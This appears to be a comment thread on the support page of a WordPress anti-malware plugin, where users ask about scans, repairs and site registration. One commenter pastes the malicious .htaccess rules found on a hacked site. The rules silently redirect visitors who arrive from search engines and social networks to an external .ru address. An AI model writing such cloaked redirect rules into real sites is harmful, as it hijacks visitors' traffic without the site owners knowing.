        I did a scan of plugins, and out of 1131 files, it found 59 potentials in 9 different plugins. These are plugins I’ve used for a long time.

        Reply
        • Anti-Malware Admin
          On September 27, 2012 at 10:50 am, Anti-Malware Admin said:

          It should say “Your Installation Key is Registered” in green letters in the Definition Updates section on the right. It should also say “Your Definitions file is current” below that. You want to make sure that you have downloaded the latest definitions. Then you want to scan your whole site (not just the plugins directory).

          I wouldn’t worry about those “Potential Threats” in Yellow, it’s just the ones in Red you should repair.

          Reply
          • Lane Lester
            On September 27, 2012 at 12:56 pm, Lane Lester said:

            Yes, when the definition update finished, it did display the above.

            Unfortunately, when I did a wp-content scan, it listed a bunch of files from one plugin in red. This is a very valuable auto-blogging plugin, and I wouldn’t want to do anything to harm it unnecessarily. What does repairing involve?

            Trying to do a public_html scan, I got this error: Fatal error: Maximum execution time of 30 seconds exceeded in /home/thewebdr/public_html/wp-content/plugins/gotmls/index.php on line 82

            I had seen that in the wp-content scan, and I added to a php.ini in public_html:
            max_execution_time = 600
            I don’t know why it’s not taking effect.

          • Anti-Malware Admin
            On September 27, 2012 at 1:16 pm, Anti-Malware Admin said:

            My plugin was designed to remove the threat from an infected file without breaking the file. Admittedly it’s not always 100% effective and I have had a couple of False Positives in the past. So, make a backup of the plugin and then run the Automatic Repair and see what happens. There is also a link to revert the changes if it dies break something.

            There are also two lines in a recursive loop within plugins/gotmls/images.php (lines 244 and 276) where you would need to change
            set_time_limit(30);
            to a higher number.

  • Zak
    On September 18, 2012 at 9:59 pm, Zak said:

    I Have found 6 potential threats what’s next?

    Reply
  • Martin Hjelte
    On September 18, 2012 at 2:52 am, Martin Hjelte said:

    Hi,

    just donated and didn’t write the sites name. Is it registered some how anyway?

    Thanks!

    Reply
    • Anti-Malware Admin
      On September 18, 2012 at 7:00 am, Anti-Malware Admin said:

      Yes. Donating from your WP-Admin will pass along your Installation Key for my plugin. I see that your donation is associated with your site name.

      Reply
  • Ranjan Selvan
    On September 17, 2012 at 5:59 pm, Ranjan Selvan said:

    Hi

    my site http://www.tradeexpressions.com.sg is infected by malware. i have scanned using this plugin and confirmed. Please tell me how to remove all those.

    Thanks
    Selvan

    Reply
    • Anti-Malware Admin
      On September 17, 2012 at 7:18 pm, Anti-Malware Admin said:

      If my plugin finds “Know Threats” (in red) you should see a button that says “Repair SELECTED files Now”.

      If all you are finding is “Potential Threats” (in yellow) then please send me a screenshot and I’ll see if anything stick out at me as suspicious.

      Reply
  • Will Chapman
    On September 14, 2012 at 3:22 am, Will Chapman said:

    Once again your great plugin spotted malware on several of my sites and then removed it. I’m just waiting to see if it sneeks back in again but meanwhile although I’ve already made a modest donation I’ve decided to make another one each time another infection is spotted.

    Cheers and keep up the good work.

    Regards

    Will Chapman

    Reply
    • Anti-Malware Admin
      On September 14, 2012 at 7:25 am, Anti-Malware Admin said:

      Thanks the donating again, I like that philosophy.

      Let me know it they come back and I can take a look (maybe figure out how they got in).

      Reply
  • Howard Berry
    On August 13, 2012 at 11:35 am, Howard Berry said:

    Hi, have had four sites hacked and used your plugin which clears the files but they soon reappear, 5 mins. On one site i cannot clear the file at all, i have enclosed a copy.

    RewriteEngine On
    RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|altavista|msn|netscape|aol|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|linkedin|flickr|liveinternet|filesearch|yell|openstat|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv|infospace).(.*)
    RewriteRule ^(.*)$ http://register-online.ru/motorist?7 [R=301,L]
    RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline).(.*)
    RewriteRule ^(.*)$ http://register-online.ru/motorist?7 [R=301,L]

    Reply
    • Anti-Malware Admin
      On August 16, 2012 at 4:29 pm, Anti-Malware Admin said:

      If you are getting reinfected that quick I would suspect there are threats or vulnerabilities that are not getting caught and removed by my plugin. If you are willing to give my access to your WP admin I could take look and run some custom scans. Maybe I can find the source. Another way you could track down the source is to compare the timestamps on an infected file to your raw access logs.

      Reply
  • Lissa Ingram
    On May 7, 2012 at 1:17 pm, Lissa Ingram said:

    Hi, I love the plugin, but I run multiple sites, and it’s not letting me use the plugin on site 2 with the same email address I used for site 1. Is there a developer’s package, or some way to do this? I use the same admin email for all of the sites. I did donate! Thanks!

    Reply
    • Anti-Malware Admin
      On May 7, 2012 at 8:32 pm, Anti-Malware Admin said:

      I am working on supporting multiple domains registered under one email account. As a test I have manually registered another one of your domains under the same account you already have (the one I added is the same one you use as your email address). If you install my GOTMLS Plugin on that domain you should see that it is already registered. You should also see that it has the ability to scan one level higher in your directory hierarchy. Hopefully this will enable you to scan all your domains on that server from one WP Admin. Please let me know if this works for you as desired or if you have any problems.

      Reply
      • pubblivori veloci
        On May 7, 2012 at 11:22 pm, pubblivori veloci said:

        I’ve the sme problem. I manage 40 no profit plogs and I would like to protect all with your plugin but seems only one could be registered with an email adress. a Pity!

        Reply
        • Anti-Malware Admin
          On May 10, 2012 at 3:14 pm, Anti-Malware Admin said:

          I have changed the registration process on gotmls.net to accept multiple site/key registrations under a single email address. Give it a try and let me know how it works for you.

          Reply
          • Bill Sutton
            On October 10, 2013 at 10:37 am, Bill Sutton said:

            I’m having a problem here too. I currently have two sites registered with gotmls.net (and I’ve donated!). But I can’t figure out how to add another site. There’s no way to do it after you’ve logged in.

            Can you help?

          • Anti-Malware Admin
            On October 10, 2013 at 10:48 am, Anti-Malware Admin said:

            The best way to register any site is to install the plugin on that site and then use the built-in registration for on the Anti-Malware Settings page in the WP-Admin of the site you want to register. If you use the same email address on the form as you did on the registration for your other sites then all your site will be registered under the same account. If you already registered the new site under a different email then you can login to that account on gotmls.net and transfer that site’s registration to your other account so that they are all together.

  • artsd
    On April 6, 2012 at 11:22 am, Art Golombek said:

    Hi Eli:
    I just downloaded your latest version 1.2.04.04 and the following two warnings are on the dashboard for the plugin:

    Warning: array_merge() [function.array-merge]: Argument #1 is not an array in …/wp-content/plugins/gotmls/index.php on line 432

    Warning: implode() [function.implode]: Invalid arguments passed in …/wp-content/plugins/gotmls/index.php on line 470

    When I run the scan, a whole slew of warnings appear about the plugin. Let me know. Thanks, Art

    Reply
  • Adrianne George
    On October 28, 2013 at 5:23 am, Adrianne George said:

    After doing a full scan I can see that your software will remove immediate threats. Thank you. Still now sure what to do, or how to fix potential7possible threats. The ones that were in plug ins I don’t use I removed all together.

    Reply
  • Anti-Malware Admin
    On October 28, 2013 at 12:01 pm, Anti-Malware Admin said:

    Usually the Potential Threats are ok. If you find Known Threats and remove them then you site will likely come up clean. You can request a review from Google in your Webmaster Tools account if you are still getting warnings from the search engine.

    Reply
  • Adrianne George
    On October 28, 2013 at 6:39 pm, Adrianne George said:

    The warning from Google is gone! You are a genious. I am now telling everyone in my vast networks on Facebook, LinkedIn, XING and Twitter to download your plug in, pronto!

    Reply

Leave a Reply

Your email address will not be published. Required fields are marked *

*

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>